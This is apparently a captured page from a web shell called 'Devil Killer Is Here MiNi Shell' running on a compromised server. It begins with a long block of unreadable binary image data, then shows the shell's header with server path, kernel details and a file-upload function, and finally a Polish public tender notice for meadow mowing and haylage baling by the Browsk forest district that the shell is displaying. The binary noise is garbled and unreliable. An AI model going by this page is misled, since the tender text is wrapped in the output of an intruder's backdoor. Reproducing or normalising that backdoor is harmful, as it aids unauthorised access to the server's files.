JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250530/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250530/0025674401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Koszenie łąk wraz ze zbiorem plonu, bez zbioru oraz rozwiezienie i wyłożenie bel sianokiszonki ze skoszonych łąk na terenie Nadleśnictwa Browsk w Gruszkach w 2025 r </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Browsk w Gruszkch</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050026271</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gruszki 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Narewka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">browsk@bialystok.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://browsk.bialystok.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka Leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Koszenie łąk wraz ze zbiorem plonu, bez zbioru oraz rozwiezienie i wyłożenie bel sianokiszonki ze skoszonych łąk na terenie Nadleśnictwa Browsk w Gruszkach w 2025 r </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-da83540a-a337-4e9a-b2bb-d71d0d210aeb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00256744</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00254772/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Koszenie łąk wraz ze zbiorem plonu, bez zbioru oraz rozwiezienie i wyłożenie bel sianokisznki ze skoszonych łąk na terenie Nadleśnictwa Browsk w Gruszkach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Programu pn.: „Zarządzanie migracją żubra we wschodniej Polsce” - finansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach programu Fundusze Europejskie dla Polski Wschodniej 2021-2027. Numer umowy o dofinansowanie FEPW.02.03-IW.01-0003/24 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/lasy_browsk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl lub poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu<br/>platformy: https://www.platformazakupowa.pl/pn/lasy_browsk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Rozporządzeniem Prezesa Rady<br/>Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W celu wykonania obowiązku nałożonego art. 13 i 14 RODO , w związku z art. 88 ustawy o zasadach realizacji zadań finansowanych ze środków europejskich w perspektywie finansowej 2021–2027 , informujemy iż:<br/>I.	Administrator danych<br/>Odrębnymi administratorami Państwa danych są:<br/>1.	Nadleśnictwo Browsk w Gruszkach; Gruszki 10, 17-220 Narewka,<br/>2.	Regionalna Dyrekcja Lasów Państwowych w Białymstoku; ul. Lipowa 51; 15-424 Bia-łystok,<br/>3.	Minister Funduszy i Polityki Regionalnej (MFiPR), w zakresie w jakim pełni funkcję In-stytucji Zarządzającej (IZ) Funduszami Europejskimi dla Polski Wschodniej 2021-2027 (FEPW 2021–2027) , z siedzibą przy ul. Wspólnej 2/4, 00-926 Warszawa;<br/>4.	Minister Klimatu i Środowiska (MKiŚ), w zakresie w jakim pełni funkcję Instytucji Po-średniczącej (IP) FEPW 2021–2027, z siedzibą przy ul. Wawelskiej 52/54, 00-922 Warszawa;<br/>5.	Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej (NFOŚiGW) w zakresie w jakim pełni funkcję Instytucji Wdrażającej (IW) Funduszami Europejskimi dla Pol-ski Wschodniej 2021-2027 (FEPW 2021–2027), z siedzibą przy ul. Konstruktorskiej 3A, 02-673 Warszawa;<br/>II.	Cel przetwarzania danych<br/>Państwa dane osobowe będą przetwarzane w związku z realizacją FEPW 2021–2027, w szczególności w celu realizacji Projektu nr FEPW.02.03-IW.01-0003/24 pn. Zarządzanie migracją żubra we wschodniej Polsce. Podanie danych jest obowiązkowe, konieczne do realizacji ww. celu. Odmowa ich podania jest równoznaczna z brakiem możliwości podjęcia stosownych działań takich jak przeprowadzenie postępowania o udzielenie zamówienia pu-blicznego w celu ponoszenia wydatków publicznych w sposób celowy i oszczędny, co wymu-sza stosowanie reguł konkurencyjnych przy wyborze wykonawcy, realizacja i wykonanie umowy z wybranymi podmiotami.<br/>III.	Podstawa przetwarzania<br/>Państwa dane osobowe będą przetwarzane w związku z tym, że:<br/>1.	Wyrazili Państwo zgodę (art. 6 ust. 1 lit a RODO).<br/>2.	Przygotowujemy i realizujemy umowy, których są Państwo stroną, a przetwarzanie da-nych osobowych jest niezbędne do ich zawarcia i wykonania (art. 6 ust. 1 lit. b RODO).<br/>3.	Zobowiązuje nas do tego prawo (art. 6 ust. 1 lit. c RODO) lub wykonujemy zadania w inte-resie publicznym lub sprawujemy powierzoną nam władzę publiczną (art. 6 ust. 1 lit. e RODO)<br/>Wszystkie te zobowiązania wynikają z poniższych przepisów prawa: <br/>•	ustawa z 28 kwietnia 2022 r. o zasadach realizacji zadań finansowanych ze środków europejskich w perspektywie finansowej 2021-2027),<br/>•	ustawa z 14 czerwca 1960 r. - Kodeks postępowania administracyjnego, <br/>•	ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych,<br/>•	ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>•	ustawa z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach.<br/>IV.	Rodzaje przetwarzanych danych<br/>Możemy przetwarzać następujące rodzaje Państwa danych:<br/>1.	Dane identyfikacyjne, wskazane w art. 87 ust. 2 pkt 1 ustawy wdrożeniowej, w tym: imię, nazwisko, adres, adres poczty elektronicznej, numer telefonu, numer faksu, PESEL, RE-GON, wykształcenie, identyfikatory internetowe,<br/>2.	Dane związane z zakresem uczestnictwa osób fizycznych w projekcie, wskazane w art. 87 ust. 2 pkt 2 ustawy wdrożeniowej2, w tym: kwota wynagrodzenia, formę i okres zaanga-żowania w projekcie,<br/>3.	Dane osób fizycznych widniejące na dokumentach potwierdzających kwalifikowalność wydatków, wskazane w art. 87 ust. 2 pkt 3 ustawy wdrożeniowej2, w tym numer rachun-ku bankowego, numer uprawnień budowlanych, numer księgi wieczystej.<br/>Dane pozyskujemy bezpośrednio od osób, których one dotyczą, albo od instytucji i podmio-tów zaangażowanych w realizację FEPW 2021–2027 w zakresie wymaganym do przeprowa-dzenia postępowania o udzielenie zamówienia publicznego czy podpisania umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">V.	Dostęp do danych osobowych<br/>Dostęp do Państwa danych osobowych mają pracownicy i współpracownicy: Regionalnej Dyrekcji Lasów Państwowych w Białymstoku, Ministerstwa Funduszy i Polityki Regionalnej, Ministerstwa Klimatu i Środowiska oraz Narodowego Funduszu Ochrony Środowiska i Gospo-darki Wodnej. Ponadto Państwa dane osobowe mogą być powierzane lub udostępniane:<br/>1.	Instytucji Audytowej, o której mowa w art. 71 rozporządzenia 2021/1060 z 24 czerwca 2021 r.,<br/>2.	Instytucjom Unii Europejskiej (UE) lub podmiotom, którym UE powierzyła zadania do-tyczące wdrażania FEPW 2021–2027,<br/>3.	Dostawcom usług prawnych i doradczych w dochodzeniu należnych roszczeń (w szcze-gólności kancelariom prawnym), dostawcom usług informatycznych, podmiotom, z któ-rymi administrator będzie współpracował w ramach umów cywilnoprawnych. <br/>4.	Podmiotom uprawnionym na podstawie przepisów prawa, m.in. podmiotom uprawnio-nym do dostępu do dokumentacji postepowania o udzielenie zamówienia publicznego.<br/>VI.	Okres przechowywania danych<br/>Będziemy przechowywać Państwa dane osobowe zgodnie z przepisami o narodowym zasobie archiwalnym i archiwach, do momentu zakończenia realizacji przez Regionalną Dyrekcję Lasów Państwowych w Białymstoku, Ministerstwa Funduszy i Polityki Regionalnej, Ministerstwa Klimatu i Środowiska oraz Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej wszelkich zadań związanych z realizacją i rozliczeniem FEPW 2021–2027 z zastrzeżeniem przepisów, które mogą przewidywać dłuższy termin przeprowadzania kontroli, a ponadto przepisów dotyczących pomocy publicznej i pomocy de minimis oraz przepisów dotyczących podatku od towarów i usług.<br/>VII.	Prawa osób, których dane dotyczą<br/>Przysługują Państwu następujące prawa:<br/>1.	Prawo dostępu do swoich danych oraz otrzymania ich kopii (art. 15 RODO),<br/>2.	Prawo do sprostowania swoich danych (art. 16 RODO),<br/>3.	Prawo do żądania od administratora ograniczenia przetwarzania swoich danych (art. 18 RODO),<br/>4.	Prawo wniesienia sprzeciwu wobec przetwarzania swoich danych (art. 21 RODO),<br/>5.	Prawo wniesienia skargi do organu nadzorczego Prezesa Urzędu Ochrony Danych Oso-bowych (art. 77 RODO) - w przypadku, gdy osoba uzna, iż przetwarzanie jej danych osobowych narusza przepisy RODO lub inne krajowe przepisy regulujące kwestię ochrony danych osobowych, obowiązujące w Polsce.<br/>VIII.	Zautomatyzowane podejmowanie decyzji<br/>Dane osobowe będą/nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>IX.	Przekazywanie danych do państwa trzeciego<br/>Państwa dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji między-narodowej innej niż Unia Europejska.<br/>X.	Odbiorcy danych lub kategorie odbiorców<br/>Odbiorcami Państwa danych mogą być podmioty wskazane w pkt V. <br/>XI.	Kontakt z administratorem danych i Inspektorem Ochrony Danych<br/>Jeśli mają Państwo pytania dotyczące przetwarzania przez nas danych osobowych, prosimy kontaktować w następujący sposób:<br/>1.	Nadleśnictwo Browsk w Gruszkach :<br/>•	pocztą tradycyjną (adres: Gruszki 10, 17-220 Narewka,),<br/>•	elektronicznie (adres e-mail: browsk@bialystok.lasy.gov.pl)<br/>2.	Inspektorami Ochrony Danych Osobowych (IOD) MFiPR:<br/>•	pocztą tradycyjną (adres: ul. Wspólna 2/4, 00-926 Warszawa),<br/>•	elektronicznie (adres e-mail: IOD@mfipr.gov.pl),<br/>3.	Inspektorami Ochrony Danych Osobowych (IOD) MKiŚ:<br/>•	pocztą tradycyjną (adres: ul. Wawelska 52/54, 00-922 Warszawa),<br/>•	elektronicznie (adres e-mail: inspektor.ochrony.danych@klimat.gov.pl).<br/>4.	Inspektorami Ochrony Danych Osobowych (IOD) NFOŚiGW<br/>•	pocztą tradycyjną (adres: ul. Konstruktorska 3A, 02-673 Warszawa),</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Realizacja prac obejmuje jednokrotne skoszenie traw na łąkach Nadleśnictwa Browsk w Gruszkach na łącznej powierzchni 43,07 ha (częściowo ze zbiorem, częściowo kosiarką bijakową) oraz wyrobieniu ze skoszonej trawy bel sianokiszonki za pomocą prasy belującej i późniejsze ich rozwiezienie. Zamówienie zostanie podzielone na 2 etapy:<br/>a)	ETAP I - Skoszenie traw wraz ze zbiorem na powierzchni 21,63 ha, prace polegające na:<br/>	skoszeniu trawy - koszenie należy wykonać na wysokości 5 – 10 cm nad powierzchnią gruntu. Nie wolno stosować koszenia okrężnego od zewnątrz do środka skoszonej powierzchni. Zaleca się koszenie okrężne od środka koszonej powierzchni.<br/>	przegrabieniu (podsuszenie traw) należy wykonać przy użyciu przetrząsaczo-zgrabiarki i rozumieć trzeba jako jednorazowe przetrząśnięcie i rozrzucenie skoszonej trawy na całej powierzchni łąki,<br/>	wyrobieniu ze skoszonej trawy bel sianokiszonki za pomocą prasy belującej o zawartości 40-60% suchej masy. Zmagazynowanie i zafoliowanie gotowych bel powinno zostać wykonane na terenie placu Nadleśnictwa Browsk w Gruszkach lub przy siedzibie Leśnictwa Gnilec, Leśnictwa Rybaki i Leśnictwa Pasieki/Łańczyno.<br/>b)	ETAP II - Skoszenie łąk za pomocą kosiarki bijakowej na powierzchni 21,44 ha.<br/>c)	Po wyrobieniu i odbiorze bel sianokiszonki z powierzchni Zamawiający wymaga aby karma została rozwieziona oraz wyłożona przez Wykonawcę w miejscach przez niego wskazanych.<br/>Zamawiający szacuje plon z łąk ze zbiorem na poziomie ok. 5t/ha. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77100000-1 - Usługi rolnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77110000-4 - Usługi doraźne produkcji rolnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującym kryterium oceny<br/>ofert:<br/>1) Cena -60%<br/>2) Samodzielna realizacja kluczowych elementów (części) zamówienia-40%<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = Cn/Co x 100 % x 60 pkt<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn – najniższa cena spośród ofert ocenianych<br/>Co – cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Formularzu Oferty (Załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium „Samodzielna realizacja kluczowych elementów (części) zamówienia” oceniane będzie przyjęcie przez<br/>Wykonawcę zobowiązania umownego do wykonywania kluczowych elementów (części) zamówienia, określonych przez<br/>Zamawiającego w SWZ, samodzielnie przez Wykonawcę składającego ofertę, tj. bez udziału podwykonawców. Zasady realizacji<br/>tego zobowiązania oraz zasady odpowiedzialności za jego niewykonanie zostały opisane we wzorze umowy (stanowiącym załącznik<br/>nr 2 do SWZ).<br/>Kluczowe elementy (części) zamówienia obejmują czynności polegające na koszeniu łąk.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do wykonywania kluczowych elementów (części)<br/>zamówienia, określonych przez Zamawiającego w SWZ, samodzielnie przez Wykonawcę składającego ofertę, tj. bez udziału<br/>podwykonawców w Formularzu Oferty (Załącznik nr 1 do SWZ).<br/>Brak wskazania w Formularzu Oferty przyjęcia przez Wykonawcę zobowiązania, o którym mowa w zdaniu poprzednim będzie<br/>uznawane jako nieprzyjęcie takiego zobowiązania, a oferta uzyska 0 pkt w ramach niniejszego kryterium oceny ofert. Oferta<br/>Wykonawcy, który zaciągnie takie zobowiązanie otrzyma 100 pkt, które następnie zostaną przemnożone przez wagę kryterium, tj. 40<br/>%.<br/>Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą sumę punktów uzyskanych w ww. kryteriach oceny ofert<br/>. Oferta może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Samodzielna realizacja kluczowych elementów (części) zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu.<br/>4) zdolności technicznej lub zawodowej:<br/>Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat liczonych wstecz od dnia, w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) zrealizował lub realizuje (przy czym w tym przypadku będzie uwzględniana wartość zrealizowanej 